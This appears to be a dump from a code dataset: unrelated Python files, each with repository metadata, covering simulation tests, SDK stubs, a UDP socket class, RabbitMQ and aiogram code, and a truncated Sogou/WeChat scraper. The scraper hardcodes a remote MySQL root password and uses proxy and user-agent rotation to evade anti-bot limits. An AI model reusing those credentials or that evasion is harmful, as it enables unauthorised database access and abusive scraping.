"liyueke@huobi.com"
] |
liyueke@huobi.com
|
fcbbaec32e58baf63051f622962e9ba754e5e366
|
908655251066427f654ee33ebdf804f9f302fcc3
|
/Tests/Pedestrian/Pedestrian_AS.py
|
6fca7c3c2b9f432c82c945dd4a51c48690014dc8
|
[] |
no_license
|
maxiaoba/MCTSPO
|
be567f80f1dcf5c35ac857a1e6690e1ac599a59d
|
eedfccb5a94e089bd925b58f3d65eef505378bbc
|
refs/heads/main
| 2023-07-05T02:20:16.752650
| 2021-07-06T06:04:40
| 2021-07-06T06:04:40
| 381,811,407
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,548
|
py
|
import mcts.AdaptiveStressTestingActionSpace as AST_AS
import mcts.ASTSim as ASTSim
import mcts.MCTSdpw as MCTSdpw
import mcts.AST_MCTS as AST_MCTS
import numpy as np
from Pedestrian.av_simulator import AVSimulator
from Pedestrian.av_reward import AVReward
from Pedestrian.av_spaces import AVSpaces
from mylab.envs.ast_env import ASTEnv
import math
np.random.seed(0)
max_path_length = 50
ec = 100.0
n = 160
top_k = 10
RNG_LENGTH = 2
SEED = 0
reward_function = AVReward()
spaces = AVSpaces(interactive=True)
sim = AVSimulator(use_seed=False,spaces=spaces,max_path_length=max_path_length)
env = ASTEnv(interactive=True,
sample_init_state=False,
s_0=[-0.5, -4.0, 1.0, 11.17, -35.0],
simulator=sim,
reward_function=reward_function,
)
ast_params = AST_AS.ASTParams(max_path_length)
ast = AST_AS.AdaptiveStressTestAS(ast_params, env)
macts_params = MCTSdpw.DPWParams(max_path_length,ec,n,0.5,0.85,1.0,0.0,True,1.0e308,np.uint64(0),top_k)
stress_test_num = 2
if stress_test_num == 2:
result = AST_MCTS.stress_test2(ast,macts_params,False)
else:
result = AST_MCTS.stress_test(ast,macts_params,False)
#reward, action_seq = result.rewards[1], result.action_seqs[1]
print("step count: ",ast.step_count)
for (i,action_seq) in enumerate(result.action_seqs):
reward, _ = ASTSim.play_sequence(ast,action_seq,sleeptime=0.0)
    print("predicted reward: ",result.rewards[i])
print("actual reward: ",reward)
|
[
"xiaobaima@DNab421bb2.stanford.edu"
] |
xiaobaima@DNab421bb2.stanford.edu
|
f66d367cd6e818d2f464c01786bf01dada756def
|
fae0230fae5f2e762e299785cbd66ebf7330d937
|
/watchtower/_io.py
|
9474a5b819d01bd7b9c93eb35a3e6ecabc9bf44c
|
[] |
no_license
|
NelleV/watchtower
|
e4bb6c178cfaf9bf909018692662769153a64d2b
|
39b5ab198ed03cf4e0b11aa766683b244125bd58
|
refs/heads/master
| 2022-10-09T18:32:36.344014
| 2022-09-28T10:02:10
| 2022-09-28T10:02:10
| 80,778,407
| 1
| 3
| null | 2017-04-10T18:32:18
| 2017-02-02T23:19:39
|
Python
|
UTF-8
|
Python
| false
| false
| 651
|
py
|
import pandas as pd
import os
def _update_and_save(filename, raw, old_raw=None):
"""
"""
if old_raw is not None:
raw = pd.concat([raw, old_raw], ignore_index=True)
if "id" in raw.columns:
subset_column = "id"
elif "sha" in raw.columns:
subset_column = "sha"
else:
raise ValueError("No known column to distinguish subsets")
raw = raw.drop_duplicates(subset=[subset_column])
_save(filename, raw)
def _save(filename, raw):
try:
os.makedirs(os.path.dirname(filename))
except OSError:
pass
raw.to_json(filename, date_format="iso")
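if __name__ == "__main__":
    # Minimal sketch of how these helpers fit together (illustrative only):
    # save a frame keyed by "id", then merge in newer rows without duplicates.
    import tempfile
    target = os.path.join(tempfile.mkdtemp(), "raw.json")
    old = pd.DataFrame({"id": [1, 2], "value": ["a", "b"]})
    _save(target, old)
    new = pd.DataFrame({"id": [2, 3], "value": ["b", "c"]})
    _update_and_save(target, new, old_raw=old)  # the row with id=2 is kept only once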
|
[
"nelle.varoquaux@gmail.com"
] |
nelle.varoquaux@gmail.com
|
c340f5ae35cb6ada1d2fe7cae70e4fcd2150d17a
|
ac5e52a3fc52dde58d208746cddabef2e378119e
|
/exps-gsn-edf/gsn-edf_ut=2.5_rd=0.8_rw=0.06_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=32/sched.py
|
95f1fd42aa48e0981658416011cf8039490df40a
|
[] |
no_license
|
ricardobtxr/experiment-scripts
|
1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1
|
7bcebff7ac2f2822423f211f1162cd017a18babb
|
refs/heads/master
| 2023-04-09T02:37:41.466794
| 2021-04-25T03:27:16
| 2021-04-25T03:27:16
| 358,926,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 294
|
py
|
-X FMLP -Q 0 -L 3 85 400
-X FMLP -Q 0 -L 3 62 200
-X FMLP -Q 0 -L 3 61 200
-X FMLP -Q 1 -L 2 55 300
-X FMLP -Q 1 -L 2 54 175
-X FMLP -Q 1 -L 2 35 200
-X FMLP -Q 2 -L 1 32 125
-X FMLP -Q 2 -L 1 25 100
-X FMLP -Q 3 -L 1 25 175
-X FMLP -Q 3 -L 1 22 100
14 150
10 250
|
[
"ricardo.btxr@gmail.com"
] |
ricardo.btxr@gmail.com
|
9ebb16b914fced04b98c5b6a064841ca987a4e17
|
ccf94dcb6b1500fcbbd56964ae8c4832a496b8b3
|
/python/baiduads-sdk-auto/test/test_negative_word_packet.py
|
2d84a0b0df973bbdbe590260f3d6719c3f2cf800
|
[
"Apache-2.0"
] |
permissive
|
baidu/baiduads-sdk
|
24c36b5cf3da9362ec5c8ecd417ff280421198ff
|
176363de5e8a4e98aaca039e4300703c3964c1c7
|
refs/heads/main
| 2023-06-08T15:40:24.787863
| 2023-05-20T03:40:51
| 2023-05-20T03:40:51
| 446,718,177
| 16
| 11
|
Apache-2.0
| 2023-06-02T05:19:40
| 2022-01-11T07:23:17
|
Python
|
UTF-8
|
Python
| false
| false
| 688
|
py
|
"""
dev2 api schema
'dev2.baidu.com' api schema # noqa: E501
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import baiduads
from baiduads.negativeword.model.negative_word_packet import NegativeWordPacket
class TestNegativeWordPacket(unittest.TestCase):
"""NegativeWordPacket unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testNegativeWordPacket(self):
"""Test NegativeWordPacket"""
# FIXME: construct object with mandatory attributes with example values
# model = NegativeWordPacket() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"tokimekiyxp@foxmail.com"
] |
tokimekiyxp@foxmail.com
|
5979042ecef7aab7fc251af4efd1c0f05b6ca7eb
|
9a28e0cecdf71cdb4eccdfc7df2554bd421fa69f
|
/src/hio/core/udp/udping.py
|
bff163c93346be5c63bb8cf904ea68b1a1ca4e35
|
[
"Apache-2.0"
] |
permissive
|
cellofellow/hio
|
a1700f3c8abc8100926dc4fc0af87efc294f6917
|
1296d196543ad01829dcb86844dfd5881af5a038
|
refs/heads/master
| 2023-04-04T01:27:01.449465
| 2021-04-08T17:26:01
| 2021-04-08T17:26:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,837
|
py
|
# -*- encoding: utf-8 -*-
"""
hio.core.udping Module
"""
import sys
import os
import errno
import socket
from binascii import hexlify
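# NOTE: the logging branches below reference a global ``console`` (an
# ioflo-style verbosity console) that this module does not import; it must be
# supplied by the surrounding package for those code paths to run.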
UDP_MAX_DATAGRAM_SIZE = (2 ** 16) - 1 # 65535
UDP_MAX_SAFE_PAYLOAD = 548 # IPV4 MTU 576 - udp headers 28
# IPV6 MTU is 1280 but headers are bigger
UDP_MAX_PACKET_SIZE = min(1024, UDP_MAX_DATAGRAM_SIZE) # assumes IPV6 capable equipment
class SocketUdpNb(object):
"""
Class to manage non blocking I/O on UDP socket.
"""
def __init__(self,
ha=None,
host='',
port=55000,
bufsize=1024,
wl=None,
bcast=False):
"""
Initialization method for instance.
ha = host address duple (host, port)
host = '' equivalant to any interface on host
port = socket port
bs = buffer size
path = path to log file directory
wl = WireLog instance ref for debug logging or over the wire tx and rx
bcast = Flag if True enables sending to broadcast addresses on socket
"""
self.ha = ha or (host, port) # ha = host address duple (host, port)
self.bs = bufsize
self.wl = wl
self.bcast = bcast
self.ss = None #server's socket needs to be opened
self.opened = False
def actualBufSizes(self):
"""
        Returns duple of the actual socket send and receive buffer sizes
(send, receive)
"""
if not self.ss:
return (0, 0)
return (self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF),
self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF))
def open(self):
"""
Opens socket in non blocking mode.
if socket not closed properly, binding socket gets error
socket.error: (48, 'Address already in use')
"""
#create socket ss = server socket
self.ss = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if self.bcast: # enable sending to broadcast addresses
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# make socket address reusable. doesn't seem to have an effect.
# the SO_REUSEADDR flag tells the kernel to reuse a local socket in
# TIME_WAIT state, without waiting for its natural timeout to expire.
# may want to look at SO_REUSEPORT
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF) < self.bs:
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.bs)
if self.ss.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF) < self.bs:
self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.bs)
self.ss.setblocking(0) #non blocking socket
#bind to Host Address Port
try:
self.ss.bind(self.ha)
except socket.error as ex:
console.terse("socket.error = {0}\n".format(ex))
return False
self.ha = self.ss.getsockname() #get resolved ha after bind
self.opened = True
return True
def reopen(self):
"""
Idempotently open socket
"""
self.close()
return self.open()
def close(self):
"""
Closes socket and logs if any
"""
if self.ss:
self.ss.close() #close socket
self.ss = None
self.opened = False
def receive(self):
"""
Perform non blocking read on socket.
returns tuple of form (data, sa)
if no data then returns (b'',None)
but always returns a tuple with two elements
"""
try:
data, sa = self.ss.recvfrom(self.bs) # sa is source (host, port)
except socket.error as ex:
# ex.args[0] is always ex.errno for better compat
if ex.args[0] in (errno.EAGAIN, errno.EWOULDBLOCK):
                return (b'', None)  # nothing received; return empty bytes for data
else:
emsg = "socket.error = {0}: receiving at {1}\n".format(ex, self.ha)
console.profuse(emsg)
raise #re raise exception ex1
if console._verbosity >= console.Wordage.profuse: # faster to check
try:
load = data.decode("UTF-8")
except UnicodeDecodeError as ex:
load = "0x{0}".format(hexlify(data).decode("ASCII"))
cmsg = ("Server at {0}, received from {1}:\n------------\n"
"{2}\n\n".format(self.ha, sa, load))
console.profuse(cmsg)
if self.wl: # log over the wire rx
self.wl.writeRx(data, who=sa)
return (data, sa)
def send(self, data, da):
"""
Perform non blocking send on socket.
data is string in python2 and bytes in python3
da is destination address tuple (destHost, destPort)
"""
try:
result = self.ss.sendto(data, da) #result is number of bytes sent
except socket.error as ex:
emsg = "socket.error = {0}: sending from {1} to {2}\n".format(ex, self.ha, da)
console.profuse(emsg)
result = 0
raise
if console._verbosity >= console.Wordage.profuse:
try:
load = data[:result].decode("UTF-8")
except UnicodeDecodeError as ex:
load = "0x{0}".format(hexlify(data[:result]).decode("ASCII"))
cmsg = ("Server at {0}, sent {1} bytes to {2}:\n------------\n"
"{3}\n\n".format(self.ha, result, da, load))
console.profuse(cmsg)
if self.wl:
self.wl.writeTx(data[:result], who=da)
return result
PeerUdp = SocketUdpNb # alias
|
[
"smith.samuel.m@gmail.com"
] |
smith.samuel.m@gmail.com
|
3c52afe069397e41486a991fd1e98c2ef777447d
|
3d989666e6ceb2abc9175dcf7b1d0c1f8c76d205
|
/py_solution/p172_factorial_trailing_zeroes.py
|
2e88229ace7c046a24203162ad16036725347fd1
|
[] |
no_license
|
dengshilong/leetcode
|
00ae0898b4645efd1de69a13f2fa92606e899297
|
5ab258f04771db37a3beb3cb0c490a06183f7b51
|
refs/heads/master
| 2021-01-10T11:58:10.396399
| 2020-04-10T12:10:54
| 2020-04-10T12:10:54
| 47,912,974
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 480
|
py
|
class Solution(object):
def trailingZeroes(self, n):
"""
:type n: int
:rtype: int
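        Trailing zeroes in n! come from factors of 5 (factors of 2 are always
        more plentiful), so the loop sums n // 5 + n // 25 + n // 125 + ...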
"""
res = 0
while n >= 5:
temp = n // 5
res += temp
n = temp
return res
if __name__ == "__main__":
solution = Solution()
assert solution.trailingZeroes(3) == 0
assert solution.trailingZeroes(5) == 1
assert solution.trailingZeroes(10) == 2
assert solution.trailingZeroes(25) == 6
|
[
"dengshilong1988@gmail.com"
] |
dengshilong1988@gmail.com
|
2b7a2c90bae671eb7855d16bc122acb73d9dafdc
|
a16f3f148455395596405fd7b11df62932f3937d
|
/career/rabbit/send2.py
|
8701013073a594d7af24fe5ebb5aa71253c6e7c5
|
[] |
no_license
|
wyzane/skill-general
|
8eeb5984c42ec2bcb59c634c7f7bca7c2476977b
|
6e5a498dd5b63117a6a20aa81ac67a1999d8ac21
|
refs/heads/master
| 2020-05-22T21:51:18.061659
| 2019-10-18T15:56:26
| 2019-10-18T15:56:26
| 186,535,789
| 0
| 0
| null | 2019-10-18T15:52:54
| 2019-05-14T03:12:39
|
Python
|
UTF-8
|
Python
| false
| false
| 619
|
py
|
import sys
import pika
conn = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = conn.channel()
channel.queue_declare(queue='task_queue',
                      durable=True) # message persistence: messages are not lost when rabbitmq restarts
message = ' '.join(sys.argv[1:]) or "hello world"
channel.basic_publish(exchange='',
routing_key='task_queue',
body=message,
properties=pika.BasicProperties(
                          delivery_mode=2, # make the message persistent
))
print("send message: ", message)
conn.close()
|
[
"wyzane1207@163.com"
] |
wyzane1207@163.com
|
a51fd66e325e13d07571a0145b88b73ff676b50b
|
a2d36e471988e0fae32e9a9d559204ebb065ab7f
|
/huaweicloud-sdk-drs/huaweicloudsdkdrs/v3/model/update_database_object_req.py
|
698caaaa0fef8649ba108b232f7219fc181dd69a
|
[
"Apache-2.0"
] |
permissive
|
zhouxy666/huaweicloud-sdk-python-v3
|
4d878a90b8e003875fc803a61414788e5e4c2c34
|
cc6f10a53205be4cb111d3ecfef8135ea804fa15
|
refs/heads/master
| 2023-09-02T07:41:12.605394
| 2021-11-12T03:20:11
| 2021-11-12T03:20:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,360
|
py
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class UpdateDatabaseObjectReq:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'job_id': 'str',
'selected': 'bool',
'sync_database': 'bool',
'job': 'list[DatabaseInfo]'
}
attribute_map = {
'job_id': 'job_id',
'selected': 'selected',
'sync_database': 'sync_database',
'job': 'job'
}
def __init__(self, job_id=None, selected=None, sync_database=None, job=None):
"""UpdateDatabaseObjectReq - a model defined in huaweicloud sdk"""
self._job_id = None
self._selected = None
self._sync_database = None
self._job = None
self.discriminator = None
self.job_id = job_id
if selected is not None:
self.selected = selected
if sync_database is not None:
self.sync_database = sync_database
if job is not None:
self.job = job
@property
def job_id(self):
"""Gets the job_id of this UpdateDatabaseObjectReq.
        Task ID
:return: The job_id of this UpdateDatabaseObjectReq.
:rtype: str
"""
return self._job_id
@job_id.setter
def job_id(self, job_id):
"""Sets the job_id of this UpdateDatabaseObjectReq.
        Task ID
:param job_id: The job_id of this UpdateDatabaseObjectReq.
:type: str
"""
self._job_id = job_id
@property
def selected(self):
"""Gets the selected of this UpdateDatabaseObjectReq.
        Whether to select objects. Yes: migrate a custom selection of objects; No: migrate everything. Defaults to No if omitted.
:return: The selected of this UpdateDatabaseObjectReq.
:rtype: bool
"""
return self._selected
@selected.setter
def selected(self, selected):
"""Sets the selected of this UpdateDatabaseObjectReq.
        Whether to select objects. Yes: migrate a custom selection of objects; No: migrate everything. Defaults to No if omitted.
:param selected: The selected of this UpdateDatabaseObjectReq.
:type: bool
"""
self._selected = selected
@property
def sync_database(self):
"""Gets the sync_database of this UpdateDatabaseObjectReq.
        Whether to synchronize at the database level
:return: The sync_database of this UpdateDatabaseObjectReq.
:rtype: bool
"""
return self._sync_database
@sync_database.setter
def sync_database(self, sync_database):
"""Sets the sync_database of this UpdateDatabaseObjectReq.
        Whether to synchronize at the database level
:param sync_database: The sync_database of this UpdateDatabaseObjectReq.
:type: bool
"""
self._sync_database = sync_database
@property
def job(self):
"""Gets the job of this UpdateDatabaseObjectReq.
        Database object selection information; required when selected is true.
:return: The job of this UpdateDatabaseObjectReq.
:rtype: list[DatabaseInfo]
"""
return self._job
@job.setter
def job(self, job):
"""Sets the job of this UpdateDatabaseObjectReq.
        Database object selection information; required when selected is true.
:param job: The job of this UpdateDatabaseObjectReq.
:type: list[DatabaseInfo]
"""
self._job = job
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UpdateDatabaseObjectReq):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
3642d4130b2a6948154873329d6f8ed1f4a69df7
|
4f408d65db60911f56110c351cb3b64835e0c5fb
|
/caffe2/python/net_printer_test.py
|
2d6f5a172326cc0d170bb65254e0db72b09f873c
|
[
"Apache-2.0",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] |
permissive
|
KeyKy/caffe2_SSD
|
a02c065aef2dbcfd00faae8be0440d7a4ff0fb76
|
7235688ea5e212dbe8609d780dd94c8c7d9fef54
|
refs/heads/master
| 2021-09-18T14:36:11.247427
| 2018-07-10T09:59:35
| 2018-07-10T09:59:35
| 89,928,918
| 8
| 5
| null | 2018-07-27T02:14:38
| 2017-05-01T14:04:20
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,901
|
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import net_printer
from caffe2.python.checkpoint import Job
from caffe2.python.net_builder import ops
from caffe2.python.task import Task, final_output
import unittest
def example_loop():
with Task():
total = ops.Const(0)
total_large = ops.Const(0)
total_small = ops.Const(0)
total_tiny = ops.Const(0)
with ops.loop(10) as loop:
outer = ops.Mul([loop.iter(), ops.Const(10)])
with ops.loop(loop.iter()) as inner:
val = ops.Add([outer, inner.iter()])
with ops.If(ops.GE([val, ops.Const(80)])) as c:
ops.Add([total_large, val], [total_large])
with c.Elif(ops.GE([val, ops.Const(50)])) as c:
ops.Add([total_small, val], [total_small])
with c.Else():
ops.Add([total_tiny, val], [total_tiny])
ops.Add([total, val], total)
def example_task():
with Task():
with ops.task_init():
one = ops.Const(1)
two = ops.Add([one, one])
with ops.task_init():
three = ops.Const(3)
accum = ops.Add([two, three])
# here, accum should be 5
with ops.task_exit():
# here, accum should be 6, since this executes after lines below
seven_1 = ops.Add([accum, one])
six = ops.Add([accum, one])
ops.Add([accum, one], [accum])
seven_2 = ops.Add([accum, one])
o6 = final_output(six)
o7_1 = final_output(seven_1)
o7_2 = final_output(seven_2)
return o6, o7_1, o7_2
def example_job():
with Job() as job:
with job.init_group:
example_loop()
example_task()
return job
class TestNetPrinter(unittest.TestCase):
def test_print(self):
self.assertTrue(len(net_printer.to_string(example_job())) > 0)
def test_valid_job(self):
job = example_job()
with job:
with Task():
# distributed_ctx_init_* ignored by analyzer
ops.Add(['distributed_ctx_init_a', 'distributed_ctx_init_b'])
net_printer.analyze(example_job())
def test_undefined_blob(self):
job = example_job()
with job:
with Task():
ops.Add(['a', 'b'])
with self.assertRaises(AssertionError):
net_printer.analyze(job)
def test_multiple_definition(self):
job = example_job()
with job:
with Task():
ops.Add([ops.Const(0), ops.Const(1)], 'out1')
with Task():
ops.Add([ops.Const(2), ops.Const(3)], 'out1')
with self.assertRaises(AssertionError):
net_printer.analyze(job)
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
549746b4c2e4c7057bd7732d19f58753950efb1d
|
5a3c4b802ea7d5ce380c38415929ebaa8799eb06
|
/tests/test_analyze_gifs.py
|
700b9bad30c536d79dd4ab352c4a24dcff1e0a73
|
[
"MIT"
] |
permissive
|
get-wrecked/gifalyzer
|
fe18855c83b2b9e2188faef92b317fa81e913b4d
|
0731d03766cfecf3fc6c64cc17022563da09b85b
|
refs/heads/master
| 2022-04-10T10:57:35.602500
| 2019-06-10T22:32:04
| 2019-06-10T22:32:04
| 93,275,859
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 514
|
py
|
import os
import pytest
from gifalyzer import analyze_gif
def test_analyze_gifs_normal():
report = analyze_gif(get_sample('200x202-26-130-130-0.gif'))
assert report['dimensions'] == (200, 202)
assert report['frame_count'] == 26
assert report['frame_delay_ms'] == 130
assert report['last_frame_delay_ms'] == 130
assert report['loop'] == 0
def get_sample(sample_name):
sample_dir = os.path.join(os.path.dirname(__file__), 'samples')
return os.path.join(sample_dir, sample_name)
|
[
"git@thusoy.com"
] |
git@thusoy.com
|
ee57158af40112b19388d679d38127b30806d32a
|
c9ad6ad969de505b3c8471c6f46dfd782a0fb498
|
/0x05-python-exceptions/0-safe_print_list.py
|
16119623870bda212d1982f12fcd78d50aa22dde
|
[] |
no_license
|
enterpreneur369/holbertonschool-higher_level_programming
|
002fd5a19b40c8b1db06b34c4344e307f24c17ac
|
dd7d3f14bf3bacb41e2116d732ced78998a4afcc
|
refs/heads/master
| 2022-06-20T00:57:27.736122
| 2020-05-06T14:26:10
| 2020-05-06T14:26:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
#!/usr/bin/python3
""" safe_print_list
Python function to print the elements of a list
"""
def safe_print_list(my_list=[], x=0):
i, p = 0, 0
try:
for i in range(x):
print("{}".format(my_list[i]), end="")
p = p + 1
except IndexError as err:
pass
finally:
print()
return (p)
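if __name__ == "__main__":
    # Illustrative run: asking for more elements than the list holds stops at
    # the IndexError and reports how many were actually printed.
    count = safe_print_list([1, 2, 3], 5)
    print("printed {} elements".format(count))  # prints 123, then reports 3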
|
[
"jose.calderon@holbertonschool.com"
] |
jose.calderon@holbertonschool.com
|
8a1230827541d821262fb3f1280ea53c87565736
|
8c618e16b15ad33a6ab6dcc4e0511e7a3acba094
|
/remcall/schema/__init__.py
|
8eb3a63f088ff55fb93ab052c031ca2d24a80f9d
|
[
"MIT"
] |
permissive
|
luphord/remcall
|
0bef9bbf13be697645f7b93fbd9a5e3ee9afd97b
|
31419ff0f5c21ea2d90f9cabdaec85b6eebcaa12
|
refs/heads/trunk
| 2021-12-25T23:44:39.888706
| 2021-12-03T08:15:58
| 2021-12-03T08:15:58
| 165,920,464
| 0
| 0
|
MIT
| 2021-12-03T08:15:59
| 2019-01-15T20:42:12
|
Python
|
UTF-8
|
Python
| false
| false
| 634
|
py
|
from .core import Type, Interface, Enum, Record, Primitive, Method, \
string, int8, int16, int32, int64, uint8, uint16, \
uint32, uint64, float32, float64, void, boolean, \
date, datetime, time, primitive_types, Array, Schema
from .base import assert_name
__all__ = ['Type', 'Interface', 'Enum', 'Record', 'Primitive', 'Method',
'string', 'int8', 'int16', 'int32', 'int64', 'uint8', 'uint16',
'uint32', 'uint64', 'float32', 'float64', 'void', 'boolean',
'date', 'datetime', 'time', 'assert_name', 'primitive_types',
'Array', 'Schema']
|
[
"luphord@protonmail.com"
] |
luphord@protonmail.com
|
7dd54bed4c22108fdd325ab8efa1459e4fdd1d11
|
a47192d5abd5f34f63b2c0e27b954ae07de47302
|
/day20/range.py
|
d17de1cba89cc621b63647419a191c9a16be7aa0
|
[] |
no_license
|
Godsmith/adventofcode2016
|
46639af6e015f0a024cde32ba0a1f98268899f4f
|
e036fb68bb53b9c79aa143b6c4645db218f77862
|
refs/heads/master
| 2020-06-15T04:21:21.012830
| 2017-01-10T21:52:30
| 2017-01-10T21:52:30
| 75,330,889
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 641
|
py
|
class Range:
def __init__(self, low, high):
self.low = low
self.high = high
def __repr__(self):
return 'Range<%s-%s>' % (self.low, self.high)
def __hash__(self):
return hash(tuple([self.low, self.high]))
def __eq__(self, other):
return self.low == other.low and self.high == other.high
@classmethod
def combine(cls, ranges):
lowest = min([r.low for r in ranges])
highest = max([r.high for r in ranges])
return cls(lowest, highest)
def can_be_combined(self, range_):
return not (self.high < range_.low - 1 or self.low > range_.high + 1)
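if __name__ == "__main__":
    # Small illustration: touching ranges count as combinable and merge into one.
    a, b = Range(1, 3), Range(4, 9)
    print(a.can_be_combined(b))   # True, since 3 and 4 are adjacent
    print(Range.combine([a, b]))  # Range<1-9>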
|
[
"filip.lange@gmail.com"
] |
filip.lange@gmail.com
|
cc748c6aadec1a2627e7132cfd476d19c690933c
|
f7127398e6bc60cdece53014dfebb58aa99c0fbd
|
/aiogram_dialog/widgets/kbd/checkbox.py
|
b6a4e010a29614fdc9277b51a146f248f8d6f885
|
[] |
no_license
|
drforse/aiogram_dialog
|
25fcae2579e9b37c43a41303232d009e04316c6a
|
984496ee7818d7896235d20f30bb662f56293385
|
refs/heads/master
| 2023-02-28T21:39:53.331894
| 2021-02-05T05:50:15
| 2021-02-05T05:50:15
| 336,158,550
| 0
| 0
| null | 2021-02-05T03:58:44
| 2021-02-05T03:58:43
| null |
UTF-8
|
Python
| false
| false
| 1,300
|
py
|
from typing import Callable, Optional, Union, Dict, Awaitable
from aiogram.types import CallbackQuery
from aiogram_dialog.manager.manager import DialogManager
from aiogram_dialog.widgets.text import Text, Case
from .button import Button
OnStateChanged = Callable[[CallbackQuery, "Checkbox", DialogManager], Awaitable]
class Checkbox(Button):
def __init__(self, checked_text: Text, unchecked_text: Text,
id: str,
on_state_changed: Optional[OnStateChanged] = None,
when: Union[str, Callable] = None):
text = Case({True: checked_text, False: unchecked_text}, selector=self._is_text_checked)
super().__init__(text, id, self._on_click, when)
self.on_state_changed = on_state_changed
async def _on_click(self, c: CallbackQuery, button: Button, manager: DialogManager):
manager.context.set_data(self.widget_id, not self.is_checked(manager), internal=True)
if self.on_state_changed:
await self.on_state_changed(c, self, manager)
def _is_text_checked(self, data: Dict, case: Case, manager: DialogManager) -> bool:
return self.is_checked(manager)
def is_checked(self, manager: DialogManager) -> bool:
return manager.context.data(self.widget_id, False, internal=True)
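# Illustrative usage (a sketch, not part of this module): assuming Const from
# aiogram_dialog.widgets.text, a two-state toggle could be declared as
#   Checkbox(Const("[x] Notifications"), Const("[ ] Notifications"), id="notifications")
# and later queried with is_checked(manager) inside a handler.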
|
[
"tishka17@mail.ru"
] |
tishka17@mail.ru
|
fef0f186e3b388ef8dbb58d698766de6b8a4cbb0
|
dee9432b12b8d5667ba3f58889344f89a032229d
|
/food/robots.py
|
62e74a1df46393c50327b29f48029c5a8199bdf9
|
[] |
no_license
|
rolllyroman/lucas
|
a39743d697483f962617428bc61bfc053e9b4095
|
e219ed3fc69ad36132ac4361c1766b279269323c
|
refs/heads/master
| 2020-04-16T06:48:55.329438
| 2019-01-24T06:20:44
| 2019-01-24T06:20:44
| 150,229,829
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,006
|
py
|
#coding:utf-8
import requests
import time
from lxml import etree
import json
# import MySQLdb
import pymysql
import random
import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )
from constant import USER_AGENT
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chromeOptions = webdriver.ChromeOptions()
# configure the proxy
chromeOptions.add_argument("--proxy-server=http://112.85.167.11:9999")
# note: there must be no spaces around '=', i.e. not --proxy-server = http://202.20.16.82:10152
driver = webdriver.Chrome(chrome_options = chromeOptions)
# headless mode (currently disabled)
# chrome_options = Options()
# chrome_options.add_argument('--headless')
# driver = webdriver.Chrome(chrome_options=chrome_options)
# driver = webdriver.Chrome()
HEADERS = {'Accept': 'text/html, application/xhtml+xml, image/jxr, */*',
'Accept-Language':'zh-Hans-CN, zh-Hans; q=0.5',
'Connection':'Keep-Alive',
# 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'}
'User-Agent':random.choice(USER_AGENT),
}
BASIC_URL = "https://weixin.sogou.com/weixin?query=%s&_sug_type_=&s_from=input&_sug_=n&type=1&page=%s&ie=utf8"
conn = pymysql.connect(host="119.23.52.3",user="root",passwd="168mysql",db="haha",charset="utf8")
conn.autocommit(1) # conn.autocommit(True)
cursor = conn.cursor()
proxies_queue = []
# def put_proxy_queue():
# url = "https://proxyapi.mimvp.com/api/fetchsecret.php?orderid=862060912114100297&num=5&http_type=3&result_fields=1,2,3"
# resp = requests.get(url)
# content = resp.content
# datas = content.split('\r\n')
# for data in datas:
# http_ip = data.split(',')[0]
